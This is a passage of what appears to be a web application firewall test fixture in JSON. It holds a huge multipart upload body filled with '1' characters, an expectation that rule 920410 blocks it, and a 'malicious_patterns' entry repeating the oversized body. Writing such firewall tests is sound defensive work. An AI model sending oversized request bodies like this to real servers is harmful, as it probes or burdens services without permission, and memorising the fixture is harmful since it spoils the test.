n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n----------111111--\n" }, "expected": { "should_block": true, "rule_ids": [ 920410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "----------111111\nContent-Disposition: form-data; name=\"bigfile\"; filename=\"file=.txt\"\nContent-Type: text/plain\n\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n1111111111111111111111111111111111111111111111111111111111111111111111111111\n11111111111111111111111111111111